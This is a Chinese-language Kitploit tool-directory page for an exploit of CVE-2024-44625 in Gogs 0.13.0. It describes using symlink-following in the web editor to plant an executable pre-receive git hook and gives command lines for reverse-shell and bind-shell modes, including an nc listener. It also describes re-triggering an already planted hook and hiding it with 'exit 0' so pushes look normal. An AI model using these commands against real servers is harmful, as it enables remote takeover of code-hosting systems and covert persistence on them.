Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-44625-Gogs-RCE-0.13.0 — CVE-2024-44625 在 Gogs 0.13.0 中的漏洞利用,通过符号链接跟随创建 git 钩子实现远程代码执行,支持反向和绑定 shell 模式。 | Kitploit
工具/GitHubGitHub/batj44/cve-2024-44625-gogs-rce-0.13.0
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队Payload 开发
GitHubbatj44/cve-2024-44625-gogs-rce-0.13.0

CVE-2024-44625-Gogs-RCE-0.13.0

CVE-2024-44625 在 Gogs 0.13.0 中的漏洞利用,通过符号链接跟随创建 git 钩子实现远程代码执行,支持反向和绑定 shell 模式。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
1天前尚未审核
分享

CVE-2024-44625 与 Gogs-RCE-0.13.0

已针对反向代理后方的 0.13.0 时代 Gogs 进行验证。 利用原理:Web 编辑器符号链接跟随至一个不存在的 .git/hooks/pre-receive 文件, 从而创建该文件(可执行)。此后每次推送到该仓库都会执行它。

用法:

反向 Shell(先运行监听器:nc -lvnp 4444)

root@kitploit:~
python3 gogs_rce_shell.py --url http://host --user admin1 --pass 'P@ss' \
    --mode reverse --lhost <YOUR_IP> --lport 4444

绑定 Shell(然后连接:nc )

root@kitploit:~
python3 gogs_rce_shell.py --url http://host --user admin1 --pass 'P@ss' \
    --mode bind --bind-port 5555

重新触发已有钩子(仓库已被植入)而无需重新植入:

root@kitploit:~
python3 gogs_rce_shell.py --url http://host --user admin1 --pass 'P@ss' \
    --mode reverse --lhost IP --lport 4444 --repo <name> --reuse --triggers 3

注意事项:

  • 该仓库是在 --owner(默认为 --user)下新建的一次性仓库。
  • 钩子路径由 --root(默认为 /data/git/gogs-repositories,Docker)推导得出。
  • exit 0 使推送看起来正常(不会出现“hook declined”错误)。
  • 下载工具